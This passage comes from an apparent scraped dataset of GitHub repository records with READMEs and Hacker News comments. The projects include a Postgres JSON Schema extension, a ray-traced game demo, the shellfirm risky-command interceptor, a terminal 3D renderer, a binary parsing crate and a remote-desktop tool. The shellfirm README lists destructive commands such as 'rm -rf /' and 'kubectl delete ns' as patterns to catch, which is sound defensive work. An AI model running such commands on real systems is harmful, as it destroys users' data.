run\n```\n\nwhich drops into a psql prompt.\n```psql\npsql (13.6)\nType \"help\" for help.\n\npg_jsonschema=# create extension pg_jsonschema;\nCREATE EXTENSION\n\npg_jsonschema=# select json_matches_schema('{\"type\": \"object\"}', '{}');\n json_matches_schema \n---------------------\n t\n(1 row)\n```\n\nfor more complete installation guidelines see the [pgx](https://github.com/tcdi/pgx) docs.\n\n\n## Prior Art\n\n[postgres-json-schema](https://github.com/gavinwahl/postgres-json-schema) - JSON Schema Postgres extension written in PL/pgSQL\n\n[is_jsonb_valid](https://github.com/furstenheim/is_jsonb_valid) - JSON Schema Postgres extension written in C\n\n[pgx_json_schema](https://github.com/jefbarn/pgx_json_schema) - JSON Schema Postgres extension written with pgx + jsonschema\n\n\n## Benchmark\n\n\n#### System\n- 2021 MacBook Pro M1 Max (32GB)\n- macOS 12.4\n- PostgreSQL 14.1\n\n### Setup\nValidating the following schema on 20k unique inserts\n\n```json\n{\n \"type\": \"object\",\n \"properties\": {\n \"a\": {\"type\": \"number\"},\n \"b\": {\"type\": \"string\"}\n }\n}\n```\n\n```sql\ncreate table bench_test_pg_jsonschema(\n meta jsonb,\n check (\n jsonb_matches_schema(\n '{\"type\": \"object\", \"properties\": {\"a\": {\"type\": \"number\"}, \"b\": {\"type\": \"string\"}}}',\n meta\n )\n )\n);\n\ninsert into bench_test_pg_jsonschema(meta)\nselect\n json_build_object(\n 'a', i,\n 'b', i::text\n )\nfrom\n generate_series(1, 200000) t(i);\n-- Query Completed in 2.18 seconds \n```\nfor comparison, the equivalent test using postgres-json-schema's `validate_json_schema` function ran in 5.54 seconds. 
pg_jsonschema's ~2.5x speedup on this example JSON schema grows quickly as the schema becomes more complex.\n", "readme_type": "markdown", "hn_comments": "Thank you!Some suggestion for the next roadmap:- a Dockerfile ( The dockerfile helps me a lot in trying out new technologies )- info about the compatibility with new PG15- CI/CDI was just looking into this for handling typescript integration with postgres. I think there's a lot of opportunity to make that work really well. Zapatos and pg-typegen are good steps but it could be even better.The `jsonschema` crate author here.First of all, this is an exciting use case, I didn't even anticipate it when started `jsonschema` (it was my excuse to play with Rust). I am extremely pleased to see such a Postgres extension :)At the moment it supports Drafts 4, 6, and 7 + partially supports Draft 2019-09 and 2020-12. It would be really cool if we can collaborate on finishing support for these partially supported drafts! What do you think?If you'll have any bug reports on the validation part, feel free to report them to our issue tracker - https://github.com/Stranger6667/jsonschema-rs/issues.Re: performance - there are a couple of tricks I've been working on, so if anybody is interested in speeding this up, feel free to join here - https://github.com/Stranger6667/jsonschema-rs/pull/373P.S. As for the \"Prior Art\" section, I think that https://github.com/jefbarn/pgx_json_schema should be mentioned there, as it is also based on `pgx` and `jsonschema`.I just love the work both Supabase & Hasura have done making people aware of how powerful Postgres is.How does this validate data with a variable amount of keys with the same value type for example a to-do listmy day to day to do list varies in the number of tasks, but the completion will always be in boolean [\n {\n \"task\": \"do Foo\", \n \"completed\": False, \n }, \n {\n \"task\": \"do Bar\", \n \"completed\": False, \n }, \n {\n \"task\": \"do Baz\", \n \"completed\": False, \n }, \n ...\n ]\n\nAlso, what is the issue of schema validation before inserting into the json column, as this is what I'm doing with a small microservice with Redis.This is awesome -- really excited that Supabase is picking this up with their commitment to open source in general and PG in particular.Some prior art:- https://github.com/gavinwahl/postgres-json-schema (mentioned in the repo)- https://github.com/furstenheim/is_jsonb_validpgx[0] is going to be pretty revolutionary for the postgres ecosystem I think -- there is so much functionality that would benefit from happening inside the database and I can't think of a language I want to use at the DB level more than Rust.[0]: https://github.com/tcdi/pgxNot experienced with Postgres and its ecosystem unfortunately, but all those Postgres extensions popping up on hn lately certainly make me envious. To someone with more insight: How risky is it to rely on those extensions? I guess rust handles the 'accidental data corruption or crashes' aspect. How difficult is it to continue to use such an extension once the original author walks away? Is the extension API somewhat (or perfectly?) stable? Given that this example probably mostly used in CHECK contraints, I guess it could be fairly easy removed or replaced from a running installation?This is awesome! I remember playing with Hasura (which uses Postgres) a few years ago. 
Hasura is great but one of the things I really wanted was JSON schema validation at a database level so I could keep all the \"raw\" types together if that makes sense. I was then, and do now, do public-facing schema validation but that doesn't necessarily validate how it's going to be persisted into the database so being able to have that closer to the database level now is great.Nice work, however, I am structurally dubious of putting too much functionality onto a classical centralized RDBMS since it can't be scaled out if performance becomes a problem. It's CPU load and it's tying up a connection which is a large memory load (as implemented in postgres, connections are \"expensive\") and since this occurs inside a transaction it's holding locks/etc as well. I know it's all compiled native code so it's about as fast as it can be, but, it's just a question of whether it's the right place to do that as a general concern.I'd strongly prefer to have the application layer do generic json-schema validation since you can spawn arbitrary containers to spread the load. Obviously some things are unavoidable if you want to maintain foreign-key constraints or db-level check constraints/etc but people frown on check constraints sometimes as well. Semantic validity should be checked before it gets to the DB.I was exploring a project with JSON generation views inside the database for coupling the DB directly to SOLR for direct data import, and while it worked fine (and performed fine with toy problems) that was just always my concern... even there where it's not holding write locks/etc, how much harder are you hitting the DB for stuff that, ultimately, can. be done slower but more scalably in an application container?YAGNI, I know, cross the bridge when it comes, butjust as a blanket architectural concern that's not really where it belongs imo.In my case at least, probably it's something that could be pushed off to followers in a leader-follower cluster as a kind of read replica, but I dunno if that's how it's implemented or not. \"Read replicas\" are something that are a lot more fleshed out in Citus, Enterprise, and the other commercial offerings built on raw Postgres iirc.This is really cool. This will make it much simpler to convert from firestore to supabase. \nI think that's the last missing feature that firestore provided which supabase didn't.We are already running a sync process between firestore and postgres. So we can do aggregations on JSON data. At this point it's only a matter of time before we move to superbaseThis is absolutely brilliant.In windmill, https://github.com/windmill-labs/windmill (self-hostable AWS Lambda, OSS AGPLv3) we infer the jsonschema of your script by doing static analysis but so far we were not doing validation of the payload itself, if your script failed because of incorrect payload that was your problem. Now without any additional effort I will be able to add validation and great error reporting \"for free\".If adding this check to an existing table with millions of records, will it scan the entire table checking all of the records, or just check when the records are inserted or updated.As an aside, I'm a long time backend developer writing my first mobile app with Dart/Flutter. I tried the popular backend recommendation in that ecosystem. After weeks wasted on it, I googled \"{PopularBackend} alternatives\" out of frustration and this thing called \"Supabase\" appeared in the results. What a breath of fresh air it's been. 
It uses Postgres as a backend (with postgREST), which means I can put all those skills to good use (you can go far with all the batteries Postgres comes equipped with: row-level security, triggers, functions, etc). It's open source and the free tier lets me do pretty much all I need for development (and probably for a production MVP). Which means I don't have to worry about \"after questions\" until after.Supabase team keep doing what you're doing!So we\u2019ve come full circle and now JSON is just XML with lighter syntax.I have a very dumb question: why would you use this instead of a traditional schema? I thought the value of json columns was to be partially schemaless and flexibleWhat is the use case for this versus normal column definitions, if you\u2019re looking to enforce schemas?Very cool!I remember when kicking the tires on postgrest/postgraphile that I found validation and error handling to be one of the less intuitive areas. Not the actual field-level constraints, but how to adapt it to fit a fast-fail vs slow-fail model.When I had attempted before, the only ergonomic option was fast-fail (the first check constraint violated would bubble the error upward) rather than slow-fail (collect all invalid fields and return the collection of errors, which IME is more common on average web forms or api requests).Looking at the single code file and tests, I see only singular field errors. Has a more ergonomic approach to validation-error collection been developed other than writing a large function to iterate the new record fieldwise against the schema?It would be valuable to know which JSON-Schema it supports, since there are currently 4 different versions that differ in their capabilities (as one might expect). Related to that, does it honor the \"$schema\" key allowing the schema to declare which version it is?The postgres-json-schema alternative that's mentioned in the repo also ships with what appears to be a conformance test suite; does this carry the same, or was the focus more on speed?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "h3r2tic/cornell-mcray", "link": "https://github.com/h3r2tic/cornell-mcray", "tags": [], "stars": 656, "description": "\ud83d\udd79 A quick'n'dirty game sample using kajiya, physx-rs, and dolly", "lang": "Rust", "repo_lang": "", "readme": "\n\n\n\n\n\n
\n \n# \ud83d\udd79\ufe0f Cornell McRay t'Racing\n\nA quick'n'dirty game sample using [`kajiya`](https://github.com/EmbarkStudios/kajiya), [`physx-rs`](https://github.com/EmbarkStudios/physx-rs), and [`dolly`](https://github.com/h3r2tic/dolly).\n\n![mcray](https://user-images.githubusercontent.com/16522064/146706174-dabbe36a-d846-4550-a6d6-35aa9047c4f6.gif)\n\n
\n\n## System requirements\n\nSee [the `kajiya` readme](https://github.com/EmbarkStudios/kajiya/#platforms).\n\n## Building\n\nClone this repo to the same parent directory that `kajiya` is in:\n\n```\nkajiya/ <- root of the `kajiya` repository\ncornell-mcray/ <- this repository\n```\n\nMake sure the `bake` bin in the `kajiya` folder is built:\n\n```\ncd kajiya\ncargo build --release -p bake\n```\n\nBake the meshes for `cornell-mcray`:\n\n```\ncd cornell-mcray\nbake.cmd\n```\n\n^ replace `bake.cmd` with `./bake.sh` on Linux.\n\n## Running\n\nMake sure `dxcompiler.dll` / `libdxcompiler.so` is in the executable environment.\n\n_(You can grab it from `kajiya` and copy into `cornell-mcray`, or stash it somewhere in the system `PATH`)_\n\nThen run:\n\n```\ncargo run --release\n```\n\n## Controls\n\n* WSAD - driving\n* Shift - nitro\n* B - spawn a box \ud83e\udd37\u200d\u2642\ufe0f\n* Q - party mode \ud83c\udf8a\n\n## License\n\nThis contribution is dual licensed under EITHER OF\n\n* Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or )\n* MIT license ([LICENSE-MIT](LICENSE-MIT) or )\n\nat your option.\n", "readme_type": "markdown", "hn_comments": "No chequer board pattern. Is this even really ray tracing?The astute among you will notice that the outputs look more or less indistinguishable from modern video games -- which is to say, they don't look real.It's not to downplay the achievement. It's to say that I hope one of you takes up the task of making truly real, indistinguishable-from-TV videos generated in real time.It may seem like an impossible dream. But so was realtime raytracing, at the start of my career. And there are a few promising signs that it's coming within reach. ML trained on video, applied to gamedev, seems like a matter of time. You could do it right now.Since the talking point of \"We don't want real-looking outputs!\" always comes up, I suggest ignoring that detail. It's worth doing, even if nobody wanted it, just to show biology who's boss. And incidentally, you'll want to become familiar with how to run blinded experiments, since you'll realize that your own judgement isn't any good when deciding how \"real\" something looks. The sole test is whether human observers can distinguish your outputs from real outputs no better than random chance.I'm not sure people appreciate how many hours of \"hacks\" are going to disappear nearly overnight when real time ray tracing becomes common place. Things as conceptually simple as \"soft shadows\" have multiple manifestations and implementations, and require dozens of hacks to pull off believably.This is incredibleRaytracing is clever. Good for realism. But end of the day, these are games, not simulations. Being blinded by reflective materials periodically doesn't sound like my kinda funThe real time ray tracing is a massive achievement. Tbf I never thought it would be possible to do in my lifetime (and it really isn\u2019t, it\u2019s a lot of impressive smoke and mirrors like reservoir sampling!) but this is really close to a path traced look considering how few samples it really is per pixel.All that aside, what really stands out with this demo is how nice the dev experience is. Lots of bits and pieces that didn\u2019t exist 10 or 20 years ago. It\u2019s git clone and cargo run. The threshold for tinkering with a repo like this compared to an old C++ equivalent is extremely low. I had to try making the day/night sky dynamic and it was literally a two minute job even though I\u2019m a rust newbie.Anyone got a binary? 
I don't have a good track record with successful compiles.I'm sincerely hoping that whoever wrote this is a hockey fan.(for those who aren't, Connor McDavid is arguably the best hockey player alive today)I don't have a RTX serie so... but I notice on the gif, there is a light leak on that white column, both sides of the base, around 80% of the gif?I thought this was ray tracing but I take it it must still takes shortcuts to do this in real time?Is that a draw distance issue or some other approximation, it reminds me of shadow mapping going wrong.https://github.com/EmbarkStudios/kajiyakajiya currently works on a limited range of operating systems and hardware.Hardware:Nvidia RTX seriesNvidia GTX 1060 and newer (slow: driver-emulated ray-tracing)AMD Radeon RX 6000 seriesThe aesthetic kinda reminds me of the Jet Car Stunts iOS app[1], I wonder if that was an inspiration. JCS had pre-baked lighting textures, which meant it could play well on ancient iOS devices while still looking good - but of course, not quite as good as real-time raytracing.[1] https://apps.apple.com/us/app/jet-car-stunts/id337866370", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kaplanelad/shellfirm", "link": "https://github.com/kaplanelad/shellfirm", "tags": ["rust", "devops", "zsh", "terminal", "shell", "devops-tools", "prompt", "captcha"], "stars": 656, "description": "Intercept any risky patterns (default or defined by you) and prompt you a small challenge for double verification", "lang": "Rust", "repo_lang": "", "readme": "
# shellfirm\n\n> Opppppsss you did it again? :scream: :scream: :cold_sweat:\n\nHow do I save myself from myself?\n* `rm -rf *`\n* `git reset --hard` before hitting the enter key?\n* `kubectl delete ns` Stop! You are going to delete a lot of resources.\n* And many more!\n\nDo you want to learn from other people's mistakes?\n\n`shellfirm` will intercept any risky patterns and immediately prompt a small challenge that double-verifies your action; think of it as a captcha for your terminal.\n\n```bash\nrm -rf /\n#######################\n# RISKY COMMAND FOUND #\n#######################\n* You are going to delete everything in the path.\n\nSolve the challenge: 8 + 0 = ? (^C to cancel)\n```\n\n## How does it work?\n`shellfirm` evaluates all shell commands behind the scenes.\nIf a risky pattern is detected, you immediately get a prompt with the relevant warning to verify your command (a rough Rust sketch of this check follows the setup options below).\n\n## Example\n![](./docs/media/example.gif)\n\n\n## Setup your shell\n\n### Install via brew\n```bash\nbrew tap kaplanelad/tap && brew install shellfirm\n```\n\nOr download the binary file from the [releases page](https://github.com/kaplanelad/shellfirm/releases), unzip the file and move it to the `/usr/local/bin` folder.\n\nValidate the shellfirm installation:\n```\nshellfirm --version\n```\n\n## Verify installation\n```\nmkdir /tmp/shellfirm\ncd /tmp/shellfirm\ngit reset --hard\n```\n\n## Select your shell\n
\n### Oh My Zsh\n\nDownload the zsh plugin:\n\n```sh\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.oh-my-zsh.zsh --create-dirs -o ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/shellfirm/shellfirm.plugin.zsh\n```\n\nAdd `shellfirm` to the list of Oh My Zsh plugins loaded when Zsh starts (inside ~/.zshrc):\n\n```bash\nplugins=(... shellfirm)\n```\n
\n
\n### Bash\n\nThe Bash implementation is based on the https://github.com/rcaloras/bash-preexec project, which adds a pre-exec hook to catch the command before it executes.\n\n```sh\n# Download bash-preexec hook functions. \ncurl https://raw.githubusercontent.com/rcaloras/bash-preexec/master/bash-preexec.sh -o ~/.bash-preexec.sh\n\n# Source our file at the end of our bash profile (e.g. ~/.bashrc, ~/.profile, or ~/.bash_profile)\necho '[[ -f ~/.bash-preexec.sh ]] && source ~/.bash-preexec.sh' >> ~/.bashrc\n\n# Download the shellfirm pre-exec function\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.sh -o ~/.shellfirm-plugin.sh\n\n# Load the pre-exec command when the shell is initialized\necho 'source ~/.shellfirm-plugin.sh' >> ~/.bashrc\n```\n
\n
\n### fish\n\n```sh\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.fish -o ~/.config/fish/conf.d/shellfirm.plugin.fish\n```\n
\n
\n### Zsh\n\n```sh\n# Download the shellfirm plugin and source it from ~/.zshrc\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.zsh -o ~/.shellfirm-plugin.sh\necho 'source ~/.shellfirm-plugin.sh' >> ~/.zshrc\n```\n
\n
\n### Docker\n\n* [bash](./docs/docker/bash)\n* [zsh](./docs/docker/zsh)\n
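\nAs referenced in \"How does it work?\" above, here is a rough Rust sketch of the intercept-and-challenge idea. It is only an illustration, not shellfirm's actual code: shellfirm matches configurable risky patterns, while this sketch uses plain substring checks to stay std-only, and its command line and challenge are hard-coded.\n\n```rust\nuse std::io::{self, Write};\n\n// Rough illustration of the check: match the command against risky patterns\n// and demand a small challenge before continuing. Hypothetical and simplified.\nfn is_risky(cmd: &str) -> Option<&'static str> {\n    let patterns = [\n        (\"rm -rf\", \"You are going to force-delete recursively.\"),\n        (\"git reset --hard\", \"You are going to discard local changes.\"),\n        (\"kubectl delete ns\", \"You are going to delete a namespace.\"),\n    ];\n    patterns.iter().find(|(p, _)| cmd.contains(*p)).map(|(_, w)| *w)\n}\n\nfn main() {\n    let cmd = \"rm -rf ./build\"; // stand-in for the intercepted command\n    if let Some(warning) = is_risky(cmd) {\n        println!(\"# RISKY COMMAND FOUND #\");\n        println!(\"* {warning}\");\n        print!(\"Solve the challenge: 7 + 2 = ? \");\n        io::stdout().flush().unwrap();\n        let mut answer = String::new();\n        io::stdin().read_line(&mut answer).unwrap();\n        if answer.trim() != \"9\" {\n            eprintln!(\"wrong answer, aborting\");\n            std::process::exit(1);\n        }\n    }\n    println!(\"running: {cmd}\");\n}\n```\n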
\n:information_source: Open a new shell session\n\n:eyes: :eyes: [Verify installation](./README.md#verify-installation) :eyes: :eyes:\n\nYou should get a `shellfirm` prompt challenge. \n\n**If you didn't get the prompt challenge:**\n1. Make sure `shellfirm --version` returns a valid response.\n2. Make sure that you downloaded the Zsh plugin and added it to the Oh My Zsh plugins in .zshrc.\n\n## Risky commands\nWe have predefined a baseline of risky command groups that are enabled by default; these are risky commands that might be destructive.\n\n| Group | Enabled By Default |\n| --- | --- |\n| [base](./docs/checks/base.md) | `true` |\n| [git](./docs/checks/git.md) | `true` |\n| [fs](./docs/checks/fs.md) | `true` |\n| [fs-strict](./docs/checks/fs-strict.md) | `false` |\n| [kubernetes](./docs/checks/kubernetes.md) | `false` |\n| [kubernetes-strict](./docs/checks/kubernetes-strict.md) | `false` |\n| [heroku](./docs/checks/heroku.md) | `false` |\n| [terraform](./docs/checks/terraform.md) | `false` |\n\n\n### Add/Remove group checks\n```bash\nshellfirm config update-groups\n```\n\n## Change challenge\n\nCurrently we support 3 different challenges when a risky command is intercepted:\n* `Math` - The default challenge, which requires you to solve a math question.\n* `Enter` - Requires only pressing `Enter` to continue.\n* `Yes` - Requires typing `yes` to continue.\n\nYou can change the default challenge by running the command:\n```bash\nshellfirm config challenge\n```\n\n*At any time you can cancel a risky command by hitting `^C`*\n\n## Ignore pattern\n\nYou can disable one or more patterns in a selected group by running the command:\n```bash\nshellfirm config ignore\n```\n\n## Deny pattern command\n\nRestrict commands by selecting pattern ids that are not allowed to run in the shell:\n```bash\nshellfirm config deny\n```\n\n## To Upgrade `shellfirm`\n```bash\nbrew upgrade shellfirm\n```\n\n## Contributing\nThank you for your interest in contributing! Please refer to the [contribution guidelines](./CONTRIBUTING.md) for guidance.\n\n# Copyright\nCopyright (c) 2022 [@kaplanelad](https://github.com/kaplanelad). See [LICENSE](LICENSE.txt) for further details.\n\n", "readme_type": "markdown", "hn_comments": "This should be a small, easy to read bash script.\n\nNot a plethora of rust files that compile to a binary.\n\nI would never trust this thing to not cause more issues, unless it is so small and elegant, that I can audit it very easily and be very very sure it is safe.\n\nOne thing not clear from readme: Will it detect if it's in a TTY or might it also trigger from commands triggered inside shell scripts?\n\nI frequently do `git reset --hard`, knowing what I am doing, until I found that I probably need the code a few days later.\n\nPerhaps I just need a tool to intercept this and backup the affected files somewhere. The files can be deleted after some time (a week? or never?). And when I regret resetting the files, I can just dig through the backup and try to find it.\n\nI think there is another use case for a tool like this: predictable auto completion instead of input validation.\n\nFor example, if you type this:\n`mkdir test && cd test` the tool could realize that the `test` folder was created and offer tab completion for it in the second part. I have long wanted a shell with better auto completion, more prediction etc.\n\nI don\u2019t think it may help in a long run, except in cases when you mistyped a command. Mistakes are done because some assumptions are wrong, e.g. 
wrong cwd, hostname, account, and a captcha-like barrier cannot point that out or make you think about it more. The correct way to prevent mistakes is easy reversibility. Except for very big files/changes we now have an essentially unlimited disk space. Programs should learn to use it to manage undo.\n\nOne way to do it is to use your shell functions (or aliases), for example for bash:\n\nfunction rm() {\n if [[ \"$@\" =~ \"-rf\" && \"${RISKY}\" != \"1\" ]]; then\n echo \"Confirm by running RISKY=1 rm $@\"\n else\n command rm \"$@\"\n fi\n }\n\nThis goes into ~/.bashrc and I have a lot of commands customized to save time (for example git [1] or docker)\n\n[1]: https://gist.github.com/huksley/ef70da85f8dc0c9ca6f8ec4f37c3...\n\nOther than rm -rf / (which can happen if you manage to hit enter rather than another key) this feels not terribly useful. Who has accidentally kubectl delete ns prod? Anecdotally, the accidental enter seems like a much more likely scenario (I once ruined a server by chmod -r a+r / ing \u2014 that feels like a better use case for accident protection).\n\nUsually when I make these mistakes I\u2019m running the command on purpose, but my context is somehow confused. So I would probably happily solve the challenge and break everything.\n\nDo people really issue these risky commands (and regret)? Or is it rather variable substitution which comes into play? E.g. a reference to an undeclared variable which renders to an empty string.\n\nOnly because the creator is on here: oops has two O's. Unless you were making a pun with ops in which case maybe remove the elongation so it doesn't seem like a typo.\n\nHow do I save myself from myself?\nrm -rf *\ngit reset --hard Before hitting the enter key?\nkubectl delete ns Stop! you are going to delete a lot of resources\nAnd many more!\n\nvisit here: https://github.com/kaplanelad/shellfirm\n\nThis kind of tool needs context awareness to be useful.\n\nAfter the first 30~40 times you\u2019re asked if you want to delete these pods, solving the question coming next becomes automatic. If you\u2019re in a \u201cI\u2019m on my dev env, nothing bad can happen\u201d mindset, that prompt won\u2019t get you out of it, it will just be a tedious step, we\u2019ve seen that time and time again.\n\nIt becomes a lot more interesting if it can ask \u201cyou\u2019re going to delete from the cluster prod, do you really want to ?\u201d and only do so for production.\n\nSame for \u201crm -f\u201d really, if it can confirm before you\u2019re deleting a tree of thousands of files, and not when it\u2019s 3 empty directories you created 3 min ago.\n\nIt only covers rm mistakes but is so KISSly great: trash-d will alias rm so that all that you rm goes to the bin instead of disappearing for ever: https://github.com/rushsteve1/trash-d\n\nEnter - Required only to press Enter to continue.\n\nThat sounds like it would be a bit too easy to accidentally go through, especially since Enter was used to initiate the command. Hold down the key just a little too long and it'll be as if you weren't even challenged.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ecumene/rust-sloth", "link": "https://github.com/ecumene/rust-sloth", "tags": ["rust", "graphics", "computer-graphics", "graphics-3d", "cli", "cli-app", "hacktoberfest"], "stars": 655, "description": "A 3D software rasterizer... 
for the terminal!", "lang": "Rust", "repo_lang": "", "readme": "# sloth - A one-of-a-kind Rust 3D Renderer for the CLI\n![pikachu](models/demo/pikachu.gif)\n \nA one-of-a-kind command line 3D software rasterizer made with termion, tobj, and nalgebra. Currently it \nsupports OBJ file formats without textures. It also supports OBJ file formats with vertex colors.\n\n[Javascript Export Demonstration](http://ecumene.xyz/sloth-demo)\n\n## Getting Started / Uses\n---\nHere's a few really simple commands for you to get started.\n\nYou can replace `sloth <args>` with `cargo run --release -- <args>` anywhere\n\n#### Render pikachu\n```\nsloth models/Pikachu.obj\n```\n#### For multiple models: \n```\nsloth \"models/suzy.obj models/suzy.obj\"\n```\n#### You can also generate a static image:\n```\nsloth models/Pikachu.obj image -w <width> -h <height>\n```\n#### You can also generate a portable Javascript render like this:\n```\nsloth models/Pikachu.obj image -j -w <width> -h <height> > src-webify/data.js\n```\n\nThank you, contributors!\n---\n[Maxgy](https://github.com/Maxgy) \u2013 Rustfmt lint\n[donbright](https://github.com/donbright) \u2013 STL model loading added, Rustfmt lint\n[jonathandturner](https://github.com/jonathandturner) \u2013 Crossterm port\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sharksforarms/deku", "link": "https://github.com/sharksforarms/deku", "tags": ["rust", "rust-crate", "serialization", "deserialization", "parse", "encoder-decoder", "bits", "bytes", "declarative", "symmetric", "deku"], "stars": 654, "description": "Declarative binary reading and writing: bit-level, symmetric, serialization/deserialization", "lang": "Rust", "repo_lang": "", "readme": "# Deku\n\n[![Latest Version](https://img.shields.io/crates/v/deku.svg)](https://crates.io/crates/deku)\n[![Rust Documentation](https://docs.rs/deku/badge.svg)](https://docs.rs/deku)\n[![Actions Status](https://github.com/sharksforarms/deku/workflows/CI/badge.svg)](https://github.com/sharksforarms/deku/actions)\n[![codecov](https://codecov.io/gh/sharksforarms/deku/branch/master/graph/badge.svg)](https://codecov.io/gh/sharksforarms/deku)\n[![Gitter](https://badges.gitter.im/rust-deku/community.svg)](https://gitter.im/rust-deku/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nDeclarative binary reading and writing\n\nThis crate provides bit-level, symmetric, serialization/deserialization\nimplementations for structs and enums\n\n## Why use Deku\n\n**Productivity**: Deku will generate symmetric reader/writer functions for your type!\nAvoid the requirement of writing redundant, error-prone parsing and writing code\nfor binary structs or network headers\n\n## Usage\n\n```toml\n[dependencies]\ndeku = \"0.15\"\n```\n\nno_std:\n```toml\n[dependencies]\ndeku = { version = \"0.15\", default-features = false, features = [\"alloc\"] }\n```\n\n## Example\n\nSee [documentation](https://docs.rs/deku) or\n[examples](https://github.com/sharksforarms/deku/tree/master/examples) folder for more!\n\nRead big-endian data into a struct, modify a value, and write it\n\n```rust\nuse deku::prelude::*;\n\n#[derive(Debug, PartialEq, DekuRead, DekuWrite)]\n#[deku(endian = \"big\")]\nstruct DekuTest {\n #[deku(bits = \"4\")]\n field_a: u8,\n #[deku(bits = \"4\")]\n field_b: u8,\n field_c: u16,\n}\n\nfn main() {\n let data: Vec<u8> = vec![0b0110_1001, 0xBE, 0xEF];\n let (_rest, mut val) = DekuTest::from_bytes((data.as_ref(), 0)).unwrap();\n assert_eq!(DekuTest {\n field_a: 0b0110,\n field_b: 
0b1001,\n        field_c: 0xBEEF,\n    }, val);\n\n    val.field_c = 0xC0FE;\n\n    let data_out = val.to_bytes().unwrap();\n    assert_eq!(vec![0b0110_1001, 0xC0, 0xFE], data_out);\n}\n```\n\n## Changelog\n\nSee [CHANGELOG.md](https://github.com/sharksforarms/deku/blob/master/CHANGELOG.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MirrorX-Desktop/MirrorX", "link": "https://github.com/MirrorX-Desktop/MirrorX", "tags": ["remote-control", "remote-desktop", "rust", "tauri"], "stars": 653, "description": "Remote control tool for enterprises, teams and individuals. Build a fast and secure remote control network, fully under your control, in a short time.", "lang": "Rust", "repo_lang": "", "readme": "# MirrorX\n\nEnglish | \u7b80\u4f53\u4e2d\u6587\n\n
\n\n### **\u5f00\u653e**\n\nMirrorX \u662f\u4e00\u5957\u9762\u5411\u4f01\u4e1a\u3001\u56e2\u961f\u4e0e\u4e2a\u4eba\u7684\u5f00\u6e90\u8fdc\u7a0b\u684c\u9762\u89e3\u51b3\u65b9\u6848\u3002\n\n### **\u5b89\u5168**\n\n\u6240\u6709\u4e1c\u897f\u90fd\u5904\u4e8e\u60a8\u7684\u63a7\u5236\u4e4b\u4e0b\uff0c\u60a8\u8fd8\u53ef\u4ee5\u9009\u62e9\u5728\u672c\u5730\u6216\u4e91\u7aef\u90e8\u7f72\uff0c\u5e76\u4e14\u90fd\u652f\u6301\u7aef\u5230\u7aef\u52a0\u5bc6\u3002\n\n### **\u9ad8\u6027\u80fd**\n\nGPU \u52a0\u901f\u30014K \u5206\u8fa8\u7387\u300160 FPS \u7b49\u7b49\u7279\u6027\uff0c\u8ba9\u4f60\u50cf\u5728\u4f7f\u7528\u672c\u5730\u684c\u9762\u73af\u5883\u4e00\u6837\u3002\n\n\u89c6\u9891\u4e0e\u97f3\u9891\u7684\u7a7f\u900f\u3001\u6587\u4ef6\u4f20\u9001\u3001\u8de8\u5e73\u53f0\u3001\u79fb\u52a8\u8bbe\u5907\u652f\u6301\u7b49\u5fc5\u4e0d\u53ef\u5c11\u7684\u529f\u80fd\u9010\u6b65\u652f\u6301\u4e2d\uff0c\u8fd8\u6709\u66f4\u591a\u5373\u5c06\u5230\u6765\u7684\u529f\u80fd\u8ba9\u4f60\u5927\u5f00\u773c\u754c\u3002\n\n> **Note: MirrorX \u8fd8\u5904\u4e8e\u5f00\u53d1\u7684\u65e9\u671f\u9636\u6bb5, \u8bf7\u6ce8\u610f\u6211\u4eec\u4e0d\u4fdd\u8bc1\u4efb\u4f55\u5411\u540e\u517c\u5bb9\u6027**\n\n## \u7ec4\u4ef6\n\n- [MirrorX Client](https://github.com/MirrorX-Desktop/MirrorX)\n- [MirrorX Portal Server](https://github.com/MirrorX-Desktop/portal)\n- [MirrorX Relay Server](https://github.com/MirrorX-Desktop/relay)\n\n## \u514d\u8d39\u516c\u5171\u670d\u52a1\u5668\n\n> \u8fd9\u53f0\u670d\u52a1\u5668\u662f\u793e\u533a\u8d21\u732e\u7684\uff0c\u6240\u4ee5\u8bf7\u4e0d\u8981\u6ee5\u7528\u5b83\u3002\n\n| \u4f4d\u7f6e | \u914d\u7f6e |\n| :--: | :------------: |\n| \u9996\u5c14 | 1vCPU & 1G RAM |\n\n## \u53ef\u7528\u5e73\u53f0\n\n- [x] macOS\n- [x] Windows\n- [ ] Linux (WIP)\n- [ ] Android (WIP)\n- [ ] iOS (WIP)\n- [ ] Web (WIP)\n\n## \u5982\u4f55\u6784\u5efa\n\n### \u5148\u51b3\u6761\u4ef6\n\n1. \u5df2\u5b89\u88c5 `nodejs && yarn(v3)` \u3002\n2. \u5b89\u88c5 `tauri-cli` \u3002\n\n```console\ncargo install tauri-cli\n```\n\n### \u6b65\u9aa4\n\n1. \u4ece [MirrorX-Desktop/media_libraries_auto_build](https://github.com/MirrorX-Desktop/media_libraries_auto_build) \u4e0b\u8f7d\u9884\u7f16\u8bd1\u7684\u591a\u5a92\u4f53\u5e93\u4ea7\u7269\u3002\n2. \u89e3\u538b\u591a\u5a92\u4f53\u5e93\u4ea7\u7269\u5230\u4efb\u4f55\u4f60\u559c\u6b22\u7684\u8def\u5f84\u3002\n3. **\u5c06\u521a\u624d\u89e3\u538b\u7684\u591a\u5a92\u4f53\u5e93\u4ea7\u7269\u8def\u5f84\u6dfb\u52a0\u5230\u73af\u5883\u53d8\u91cf\u4e2d**\n\n - \u5bf9\u4e8e MacOS\n\n ```console\n $ export MIRRORX_MEDIA_LIBS_PATH=\u4f60\u7684\u4ea7\u7269\u89e3\u538b\u8def\u5f84\n ```\n\n - \u5bf9\u4e8e Windows 